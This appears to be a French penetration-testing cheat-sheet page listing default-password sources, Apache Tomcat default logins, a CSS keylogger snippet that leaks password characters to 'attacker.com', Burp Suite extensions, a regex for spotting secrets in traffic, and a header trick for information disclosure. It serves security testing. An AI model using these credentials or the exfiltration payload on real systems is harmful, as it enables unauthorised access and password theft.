Autre
Mots de passe par défaut
https://github.com/ihebski/DefaultCreds-cheat-sheet
https://www.routerpasswords.com/
https://cirt.net/passwords
https://default-password.info/
http://defaultpassword.us/
http://www.passwordsdatabase.com/
http://open-sez.me/
https://www.cleancss.com/router-default/
https://many-passwords.github.io/
#SCADA default passwords
https://www.hackers-arise.com/post/2016/09/21/Scada-Hacking-Default-Passwords-for-Nearly-Every-SCADA-System
Cheat-sheet
https://github.com/ihebski/DefaultCreds-cheat-sheet
Apache Tomcat
admin : admin
ADMIN : ADMIN
admin : j5Brn9
admin : None
admin : tomcat
cxsdk : kdsxc
j2deployer : j2deployer
ovwebusr : OvW*busr1
QCC : QLogic66
role : changethis
role1 : role1
role1 : tomcat
root : root
tomcat : changethis
tomcat : s3cret
tomcat : tomcat
xampp : xampp
CSS Keylogger
<style>
input[type="password"][value$="a"] {
background-image: url("http://attacker.com/a");
}
</style>
Burp Extensions
Active Scan++
AutoRepeater
HTTP Request Smuggler
Backslash Powered Scanner
Collaborator Everywhere
Log4shell everywhere
JSON Beautifier
Sitemap Extractor
Param-miner
JSON WEB Tokens
Java Deserialization Scanner
Web Cache Deception Scanner
Autorize
BurpJSLinkFinder
JS Miner
BurpBounty
domain_hunter
Turbo Intruder
Server-side prototype pollution scanner
Upload Scanner
IP rotate
HUNT scanner
Software Vulneribility scanner
IIS Tilde
Graphquail
Content Type Converter
NoWAFpls
APIKit (de API-Security)
Distribute Damage
Auth Analyzer
Regex pour AutoRepeater
URL
https?://(www.)?[-a-zA-Z0–9@:%.+~#=]{1,256}.[a-zA-Z0–9()]{1,6}\b([-a-zA-Z0–9()@:%+.~#?&//=]*)
Regex pour filtrage des requêtes interessantes dans burp history
(?i)([a-z0-9]+){0,}((_|-){0,}(\\s){0,})(key|pass|credentials|auth|cred|creds|secret|password|access|token|api)(\\s){0,}(=|:|is|>){1,}
Information disclosure
information disclosure à partir d'une manipulation d'en-tête:
Accept: application/json, text/javascript, */*, p=0.01
Dernière mise à jour
Cet article vous a-t-il été utile ?